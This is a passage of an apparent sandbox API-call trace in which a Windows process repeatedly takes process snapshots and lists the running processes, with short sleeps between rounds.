lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0220.034] Process32NextW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.034] Process32NextW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0220.035] Process32NextW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0220.035] Process32NextW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0220.035] Process32NextW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0220.035] Sleep (dwMilliseconds=0x64) [0220.131] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x204 [0220.133] Process32FirstW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.133] Process32NextW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0220.133] Process32NextW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0220.134] Process32NextW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.134] Process32NextW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0220.134] Process32NextW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.134] Process32NextW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0220.135] Process32NextW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0220.135] Process32NextW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0220.135] Process32NextW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0220.135] Process32NextW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.136] Process32NextW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.136] Process32NextW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.136] Process32NextW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.137] Process32NextW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.137] Process32NextW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0220.137] Process32NextW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.137] Process32NextW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.138] Process32NextW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0220.138] Process32NextW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.138] Process32NextW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0220.139] Process32NextW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0220.139] Process32NextW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.139] Process32NextW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0220.139] Process32NextW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0220.140] Process32NextW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0220.140] Process32NextW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0220.140] Sleep (dwMilliseconds=0x64) [0220.260] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x208 [0220.261] Process32FirstW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.262] Process32NextW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0220.262] Process32NextW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0220.262] Process32NextW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.262] Process32NextW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0220.263] Process32NextW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.263] Process32NextW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0220.263] Process32NextW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0220.264] Process32NextW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0220.264] Process32NextW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0220.264] Process32NextW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.264] Process32NextW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.265] Process32NextW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.265] Process32NextW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.265] Process32NextW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.265] Process32NextW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0220.266] Process32NextW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.266] Process32NextW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.266] Process32NextW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0220.267] Process32NextW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.267] Process32NextW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0220.267] Process32NextW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0220.267] Process32NextW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.268] Process32NextW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0220.268] Process32NextW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0220.268] Process32NextW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0220.269] Process32NextW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0220.269] Sleep (dwMilliseconds=0x64) [0220.369] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20c [0220.370] Process32FirstW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.371] Process32NextW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0220.371] Process32NextW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0220.371] Process32NextW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.372] Process32NextW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0220.372] Process32NextW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.372] Process32NextW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0220.373] Process32NextW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0220.373] Process32NextW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0220.373] Process32NextW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0220.373] Process32NextW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.374] Process32NextW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.374] Process32NextW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.374] Process32NextW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.374] Process32NextW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.375] Process32NextW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0220.375] Process32NextW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.375] Process32NextW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.376] Process32NextW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0220.376] Process32NextW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.376] Process32NextW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0220.377] Process32NextW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0220.377] Process32NextW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: 